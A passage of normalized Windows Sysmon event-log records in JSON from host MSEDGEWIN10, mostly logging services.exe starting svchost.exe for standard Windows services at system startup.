"application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s IKEEXT", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-001046700100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2496", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.068Z", "type": "raw", "uuid": "930422d5-d25b-49fb-a9a0-cf5148ea3234"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.8386411Z\"},\"EventRecordID\":\"27605\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.067\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-001019700100}\"},{\"Name\":\"ProcessId\",\"text\":\"2488\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-001019700100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2488", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.067Z", "type": "raw", "uuid": "b0981dd8-9907-4f66-befd-4728ee790e6e"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.8366184Z\"},\"EventRecordID\":\"27597\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.062\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010366f0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2476\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetSvcs -p -s iphlpsvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetSvcs -p -s iphlpsvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010366f0100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2476", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.062Z", "type": "raw", "uuid": "c23d7fec-a17d-456a-99e9-9266c090165b"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.7647850Z\"},\"EventRecordID\":\"27589\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.022\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010c4680100}\"},{\"Name\":\"ProcessId\",\"text\":\"2408\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetworkService -p -s LanmanWorkstation\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetworkService -p -s LanmanWorkstation", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010c4680100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2408", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.022Z", "type": "raw", "uuid": "33467d8b-9514-43c5-a058-c49d0b2dc271"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.5835292Z\"},\"EventRecordID\":\"27585\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.936\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001016620100}\"},{\"Name\":\"ProcessId\",\"text\":\"2364\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Winmgmt\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Winmgmt", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001016620100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2364", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.936Z", "type": "raw", "uuid": "c4670f5f-1213-43ea-8342-34abd2451ec4"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.4841868Z\"},\"EventRecordID\":\"27575\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.775\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010344d0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2204\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs -p -s ShellHWDetection\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s ShellHWDetection", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010344d0100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2204", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.775Z", "type": "raw", "uuid": "58945f8f-9132-48fb-a61b-391ca63992f8"} +{"action": "create", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.4818918Z\"},\"EventRecordID\":\"27570\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 